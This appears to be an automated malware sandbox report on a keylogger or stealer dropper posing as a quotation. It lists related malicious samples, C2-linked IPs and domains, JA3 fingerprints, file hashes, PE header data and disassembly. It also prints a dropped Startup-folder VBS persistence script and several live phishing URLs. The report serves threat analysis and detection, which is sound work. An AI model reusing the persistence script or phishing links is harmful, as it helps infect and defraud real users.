                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.32.1
                                                                                                                  slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.48.1
                                                                                                                  rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.32.1
                                                                                                                  us2.smtp.mailhostbox.comQUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.225
                                                                                                                  m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 208.91.199.225
                                                                                                                  nuevo orden.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 208.91.199.224
                                                                                                                  Lpjrd6Wxad.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.198.143
                                                                                                                  REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  s-part-0017.t-0009.fb-t-msedge.netPlusPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 13.107.253.45
                                                                                                                  https://forms.office.com/e/xknrfCPQkRGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 13.107.253.45
                                                                                                                  q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                                  • 13.107.253.45
                                                                                                                  https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fjobuli.in%2Fwinner%2FsXtxg%2FbWFyc2hhLnJvd2xhbmRAY2hlcm9rZWVicmljay5jb20=?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 13.107.253.45
                                                                                                                  https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 13.107.253.45
                                                                                                                  P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 13.107.253.45
                                                                                                                  P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 13.107.253.45
                                                                                                                  1736856908fb16676aec3e4c808c4bd5cde8e123cc70360266f85ec0ed17050bca6456c9dd274.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                                  • 13.107.253.45
                                                                                                                  pdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                                  • 13.107.253.45
                                                                                                                  RFQ____PC25-1301.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                  • 13.107.253.45
                                                                                                                  api.telegram.orgConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  12.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  TELEGRAMRUConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  12.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  12.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  http://bu9.fysou.web.id/webs6/cx.aktifkn.fiturrGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.164.13
                                                                                                                  http://bu9.fysou.web.id/webs6/aktrfn.fitur.pylterGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.164.13
                                                                                                                  Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                                                                                  • 149.154.167.99
                                                                                                                  sysadmin.exeGet hashmaliciousVidarBrowse
                                                                                                                  • 149.154.167.99
                                                                                                                  CLOUDFLARENETUSEspPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.1.5
                                                                                                                  SPOOOFER776.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.0.5
                                                                                                                  PlusPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.1.5
                                                                                                                  AimPrivStoreAtt117.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.72.57
                                                                                                                  http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  EspPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.0.5
                                                                                                                  tpmbypassprivatestore.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.1.5
                                                                                                                  SPOOOFER776.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.1.5
                                                                                                                  email.emlGet hashmaliciousunknownBrowse
                                                                                                                  • 172.64.41.3
                                                                                                                  http://www.brillflooring.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 188.114.96.3
                                                                                                                  UTMEMUSConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  PUBLIC-DOMAIN-REGISTRYUShttp://www.techigent.inGet hashmaliciousUnknownBrowse
                                                                                                                  • 103.21.59.80
                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  Xre0Nmqk09.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 162.251.80.30
                                                                                                                  8BzIVoQT3w.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 199.79.62.115
                                                                                                                  EpH9QFlrm2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 199.79.62.115
                                                                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  PO23100076.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                  • 199.79.62.115
                                                                                                                  ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.198.176
                                                                                                                  document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.225

                                                                                                                  JA3 Fingerprints

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eEspPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  SPOOOFER776.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PlusPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  AimPrivStoreAtt117.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  EspPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  SPOOOFER776.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  http://www.brillflooring.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PlusPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  AimPrivStoreAtt117.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 149.154.167.220

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Temp\zZt

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):278016
                                                                                                                  Entropy (8bit):7.004191216418647
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:IQspcIbydOalyEUSazBUbfZFm7k8MstkTUAK1Wi1S5t62B1lqNLB8RiqynGMTKCs:qpcI4gYfJ7AFLLu
                                                                                                                  MD5:EBAEEBDF8F7A3A2FA06F0BC0F8442A4C
                                                                                                                  SHA1:F880BA3FDA3A25CBBD28768A2C5108039F07389E
                                                                                                                  SHA-256:C1FDF623718DCBFEEEBEC04B3617C4D6212ECFA2396F584A666B4F43F923848B
                                                                                                                  SHA-512:75C49BFF28F10D012117C0894F72A83E2B8B758C1E68011CC362EEBCA3080F6792DA3A2D3AB07AE1E995E48938E75253FA46FE35E628E809D314DBBFD5B17CE7
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:...4RIWUK840.G9.H4AJS3FwNBV2F84QIWUO8402KG97H4AJS3F7NBV2F84.IWUA'.>2.N...5..rg.^=b&@)_F0$w6.VZ_Fk%\.:A/j:]fs..v_)\Q.DZ_k8402KG9g.4A.R0F.%:12F84QIWU.8619J.97`0AJG3F7NBVL.<4QiWUOX002K.97h4AJQ3F3NBV2F84UIWUO8402.C97J4AJS3F5N..2F(4QYWUO8$02[G97H4AZS3F7NBV2F84}.SU.8402+C9 X4AJS3F7NBV2F84QIWUO.00>KG97H4AJS3F7NBV2F84QIWUO8402KG97H4AJS3F7NBV2F84QIWUO.40:KG97H4AJS3F?nBVzF84QIWUO840.?"ACH4A.u7F7nBV2n<4QKWUO8402KG97H4AjS3&.<1$QF84FYWUOX002YG97b0AJS3F7NBV2F84.IW.aJQ\](G9;H4AJ.7F7LBV2z<4QIWUO8402KG9wH4.JS3F7NBV2F84QIWU/~002KG9.H4AHS6F..@VJ.94RIWU.846..E9.H4AJS3F7NBV2F84QIWUO8402KG97H4AJS3F7NBV2F84.4.Z...YA.97H4AJR1E3HJ^2F84QIWU1840tKG9wH4A}S3F.NBV_F84uIWU1840LKG9SH4A8S3FVNBVuF84>IWU!840LKG9)J.aJS9l.N@~.F8>Qc.&m84:.JG93;.AJY.D7NF%.F8>.JWUKK.02A.=7H02lS3L.KBV6lb4R.ASO8/_.KG37K.TLS3].hBT.|84[I}sO;.%4KG".j4C.Z3F3d.%/F82y.WUEL=02I.37H0kTQ..7NH|.834QM|Ue.J<2KC.7b.?GS3B.NhH0.54QM}w16406`G..6;AJW.F.P@.=F80{k)EO80.2aeG&H4EaS.dI\BV6m8.s7DUO<.0.i9-7H0jJy.8"NBR.F../_WUK.4..5P97L.A`qM^7NF}2l&6.QWUK..0L)G93d3?

                                                                                                                  C:\Users\user\AppData\Local\supergroup\ageless.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1586688
                                                                                                                  Entropy (8bit):7.403510543980337
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8an1jKpXvJZEWWNbD39MLJO2QfqVbW9:aTvC/MTQYxsWR7anGJqDuLxrVbW
                                                                                                                  MD5:F8410BCD14256D6D355D7076A78C074F
                                                                                                                  SHA1:7FF600A40521FB8267FD305F601832785F975D40
                                                                                                                  SHA-256:7E9B9833268DAE6E33C83B582EC7FB353F0DC6514F869E3228F0EFFA161DA00F
                                                                                                                  SHA-512:9E32B73669491BB42074018C52FFAECC415E9F24DC4FCFCD346DA8E8665E89F27C2CAAAD777294EAD64668F1E264D27D4797F28A5A1B5E58937CDEFE45B63019
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                  Reputation:low
                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...3B.g..........".................w.............@.................................6o....@...@.......@.....................d...|....@..(........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...(....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\supergroup\ageless.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):274
                                                                                                                  Entropy (8bit):3.3988741536694866
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:DMM8lfm3OOQdUfclq7UEZ+lX1WlQfSMlm6nriIM8lfQVn:DsO+vNlq7Q1zakm4mA2n
                                                                                                                  MD5:FD7F0BFB3B154E251C51D95121B7402E
                                                                                                                  SHA1:7AEB1D01DA3E9B15C68989F469BEBC3389E62FA8
                                                                                                                  SHA-256:06111E35A3B26AB871609F52DB7A40E502CDFEB70F53185118E128E95F71FFF1
                                                                                                                  SHA-512:E11EA83F4236CCE3FE00B84632EA252238DD85200DC99DA435ECBC49B603716355A6FA5A4B70FBD93EA9810BB0EA942CB4580B397CFFE5E9877ED81EC7ACDF9D
                                                                                                                  Malicious:true
                                                                                                                  Reputation:low
                                                                                                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.u.p.e.r.g.r.o.u.p.\.a.g.e.l.e.s.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.403510543980337
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:QUOTATION REQUIRED_Enatel s.r.l..exe
                                                                                                                  File size:1'586'688 bytes
                                                                                                                  MD5:f8410bcd14256d6d355d7076a78c074f
                                                                                                                  SHA1:7ff600a40521fb8267fd305f601832785f975d40
                                                                                                                  SHA256:7e9b9833268dae6e33c83b582ec7fb353f0dc6514f869e3228f0effa161da00f
                                                                                                                  SHA512:9e32b73669491bb42074018c52ffaecc415e9f24dc4fcfcd346da8e8665e89f27c2caaad777294ead64668f1e264d27d4797f28a5a1b5e58937cdefe45b63019
                                                                                                                  SSDEEP:24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8an1jKpXvJZEWWNbD39MLJO2QfqVbW9:aTvC/MTQYxsWR7anGJqDuLxrVbW
                                                                                                                  TLSH:C275D0027381C062FFAB92734F5AF6515BBC69260123E62F13981D7ABD701B1563E7A3
                                                                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                                                  File Icon

                                                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x420577
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x67864233 [Tue Jan 14 10:53:39 2025 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  call 00007F03A47B7573h
                                                                                                                  jmp 00007F03A47B6E7Fh
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007F03A47B705Dh
                                                                                                                  mov dword ptr [esi], 0049FDF0h
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                                  mov dword ptr [ecx], 0049FDF0h
                                                                                                                  ret
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007F03A47B702Ah
                                                                                                                  mov dword ptr [esi], 0049FE0Ch
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 0049FE14h
                                                                                                                  mov dword ptr [ecx], 0049FE0Ch
                                                                                                                  ret
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                                  and dword ptr [eax], 00000000h
                                                                                                                  and dword ptr [eax+04h], 00000000h
                                                                                                                  push eax
                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                  add eax, 04h
                                                                                                                  push eax
                                                                                                                  call 00007F03A47B9C1Dh
                                                                                                                  pop ecx
                                                                                                                  pop ecx
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  lea eax, dword ptr [ecx+04h]
                                                                                                                  mov dword ptr [ecx], 0049FDD0h
                                                                                                                  push eax
                                                                                                                  call 00007F03A47B9C68h
                                                                                                                  pop ecx
                                                                                                                  ret
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                                  push eax
                                                                                                                  call 00007F03A47B9C51h
                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                  pop ecx

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xaca28.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1810000x7594.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
